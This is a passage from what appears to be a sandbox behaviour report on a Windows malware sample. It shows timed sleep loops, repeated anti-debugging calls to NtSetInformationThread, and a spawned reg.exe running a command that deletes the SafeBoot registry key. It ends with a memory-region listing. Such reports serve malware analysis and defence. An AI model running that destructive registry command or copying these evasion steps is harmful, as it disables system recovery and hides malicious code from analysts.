wMilliseconds=0x1e4)) [0199.670] GetTickCount () returned 0x1d49b1d [0199.670] Sleep (dwMilliseconds=0x3e8) [0199.673] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1e7)) [0199.673] GetTickCount () returned 0x1d49f04 [0199.673] Sleep (dwMilliseconds=0x3e8) [0199.676] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1ea)) [0199.676] GetTickCount () returned 0x1d4a2eb [0199.676] Sleep (dwMilliseconds=0x3e8) [0199.678] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1ec)) [0199.682] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.683] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.683] GetCurrentThread () returned 0xfffffffe [0199.683] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.683] GetTickCount () returned 0x1d4a6e1 [0199.683] Sleep (dwMilliseconds=0x3e8) [0199.685] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1f3)) [0199.685] GetTickCount () returned 0x1d4aac8 [0199.685] Sleep (dwMilliseconds=0x3e8) [0199.686] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1f4)) [0199.687] GetTickCount () returned 0x1d4aeaf [0199.687] Sleep (dwMilliseconds=0x3e8) [0199.692] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1fa)) [0199.692] GetTickCount () returned 0x1d4b296 [0199.692] Sleep (dwMilliseconds=0x3e8) [0199.728] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x21e)) [0199.728] GetTickCount () returned 0x1d4b6ac [0199.728] Sleep (dwMilliseconds=0x3e8) [0199.744] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x22e)) [0199.744] GetTickCount () returned 0x1d4baa3 [0199.744] Sleep (dwMilliseconds=0x3e8) [0199.750] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x234)) [0199.750] GetTickCount () returned 0x1d4be8a [0199.750] Sleep (dwMilliseconds=0x3e8) [0199.765] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x243)) [0199.765] GetTickCount () returned 0x1d4c280 [0199.765] Sleep (dwMilliseconds=0x3e8) [0199.769] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x247)) [0199.769] GetTickCount () returned 0x1d4c667 [0199.769] Sleep (dwMilliseconds=0x3e8) [0199.774] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x24c)) [0199.774] GetTickCount () returned 0x1d4ca5e [0199.774] Sleep (dwMilliseconds=0x3e8) [0199.785] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x24f)) [0199.786] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.786] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.786] GetCurrentThread () returned 0xfffffffe [0199.786] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.786] GetTickCount () returned 0x1d4ce45 [0199.786] Sleep (dwMilliseconds=0x3e8) [0199.801] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x25e)) [0199.801] GetTickCount () returned 0x1d4d23b [0199.801] Sleep (dwMilliseconds=0x3e8) [0199.813] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x26e)) [0199.813] GetTickCount () returned 0x1d4d632 [0199.813] Sleep (dwMilliseconds=0x3e8) [0199.827] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x27e)) [0199.827] GetTickCount () returned 0x1d4da29 [0199.827] Sleep (dwMilliseconds=0x3e8) [0199.841] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x28d)) [0199.841] GetTickCount () returned 0x1d4de1f [0199.841] Sleep (dwMilliseconds=0x3e8) [0199.856] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x29d)) [0199.856] GetTickCount () returned 0x1d4e216 [0199.856] Sleep (dwMilliseconds=0x3e8) [0199.934] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x2eb)) [0199.934] GetTickCount () returned 0x1d4e64b [0199.935] Sleep (dwMilliseconds=0x3e8) [0200.005] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x329)) [0200.005] GetTickCount () returned 0x1d4ea70 [0200.006] Sleep (dwMilliseconds=0x3e8) [0200.043] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x358)) [0200.044] GetTickCount () returned 0x1d4ee86 [0200.044] Sleep (dwMilliseconds=0x3e8) [0200.185] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x3e4)) [0200.185] GetTickCount () returned 0x1d4f2f9 [0200.185] Sleep (dwMilliseconds=0x3e8) [0200.283] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x5a)) [0200.283] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0200.283] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0200.284] GetCurrentThread () returned 0xfffffffe [0200.284] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0200.284] GetTickCount () returned 0x1d4f73e [0200.284] Sleep (dwMilliseconds=0x3e8) [0200.372] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0xb8)) [0200.372] GetTickCount () returned 0x1d4fb83 [0200.372] Sleep (dwMilliseconds=0x3e8) [0200.490] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x125)) [0200.491] GetTickCount () returned 0x1d4ffd7 [0200.491] Sleep (dwMilliseconds=0x3e8) [0200.576] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x182)) [0200.577] GetTickCount () returned 0x1d5041b [0200.577] Sleep (dwMilliseconds=0x3e8) [0200.669] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x1e0)) [0200.669] GetTickCount () returned 0x1d50860 [0200.669] Sleep (dwMilliseconds=0x3e8) [0200.779] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x24d)) [0200.780] GetTickCount () returned 0x1d50cb4 [0200.780] Sleep (dwMilliseconds=0x3e8) [0200.872] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x2ab)) [0200.872] GetTickCount () returned 0x1d510f9 [0200.872] Sleep (dwMilliseconds=0x3e8) [0200.991] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x318)) [0200.991] GetTickCount () returned 0x1d5154d [0200.991] Sleep (dwMilliseconds=0x3e8) [0201.075] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x24, wMilliseconds=0x376)) [0201.075] GetTickCount () returned 0x1d51992 [0201.075] Sleep (dwMilliseconds=0x3e8) [0201.232] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x2a)) [0201.232] GetTickCount () returned 0x1d51e15 [0201.232] Sleep (dwMilliseconds=0x3e8) [0201.406] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0xb6)) [0201.407] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0201.407] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0201.407] GetCurrentThread () returned 0xfffffffe [0201.407] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0201.408] GetTickCount () returned 0x1d52288 [0201.408] Sleep (dwMilliseconds=0x3e8) [0201.510] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x123)) [0201.510] GetTickCount () returned 0x1d526dc [0201.510] Sleep (dwMilliseconds=0x3e8) [0201.604] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x181)) [0201.604] GetTickCount () returned 0x1d52b21 [0201.605] Sleep (dwMilliseconds=0x3e8) [0201.697] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x1de)) [0201.697] GetTickCount () returned 0x1d52f65 [0201.697] Sleep (dwMilliseconds=0x3e8) [0201.807] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x23c)) [0201.807] GetTickCount () returned 0x1d533aa [0201.807] Sleep (dwMilliseconds=0x3e8) [0201.916] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x2a9)) [0201.916] GetTickCount () returned 0x1d537fe [0201.916] Sleep (dwMilliseconds=0x3e8) [0202.010] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x307)) [0202.010] GetTickCount () returned 0x1d53c43 [0202.010] Sleep (dwMilliseconds=0x3e8) [0202.076] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x345)) [0202.076] GetTickCount () returned 0x1d54068 [0202.076] Sleep (dwMilliseconds=0x3e8) [0202.232] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x25, wMilliseconds=0x3e1)) [0202.232] GetTickCount () returned 0x1d544eb [0202.233] Sleep (dwMilliseconds=0x3e8) [0202.319] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x26, wMilliseconds=0x47)) [0202.320] GetTickCount () returned 0x1d54930 [0202.320] Sleep (dwMilliseconds=0x3e8) Process: id = "12" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x1a744000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xfd4" cmd_line = "REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1882 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1883 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1884 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1885 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1886 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1887 start_va = 0xa0000 end_va = 0xf1fff monitored = 1 entry_point = 0xa1bca region_type = mapped_file name = "reg.exe" filename = "\\Windows\\SysWOW64\\reg.exe" (normalized: "c:\\windows\\syswow64\\reg.exe") Region: id = 1888 start_va = 0x120000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1889 start_va = 0x280000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1890 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1891 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1892 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1893 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1894 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1895 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1896 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1897 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1898 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1899 start_va = 0x2c0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1900 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1901 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1902 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1903 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1904 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1905 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1906 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1907 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1908 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1937 start_va = 0x3f0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1938 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1939 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1940 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1941 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1942 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1985 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1986 start_va = 0x160000 end_va = 0x1c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1987 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1988 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1989 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1990 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1991 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1992 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1993 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1994 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1995 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1996 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1997 start_va = 0x76c00000 end_va = 0x76c34fff monitored = 0 entry_point = 0x76c0145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1998 start_va = 0x77a30000 end_va = 0x77a35fff monitored = 0 entry_point = 0x77a31782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1999 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2004 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2005 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2006 start_va = 0x5a0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2007 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2008 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2009 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2010 start_va = 0x730000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 2011 start_va = 0x8c0000 end_va = 0x1cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 2012 start_va = 0x30000 end_va = 0x38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "reg.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\reg.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\reg.exe.mui") 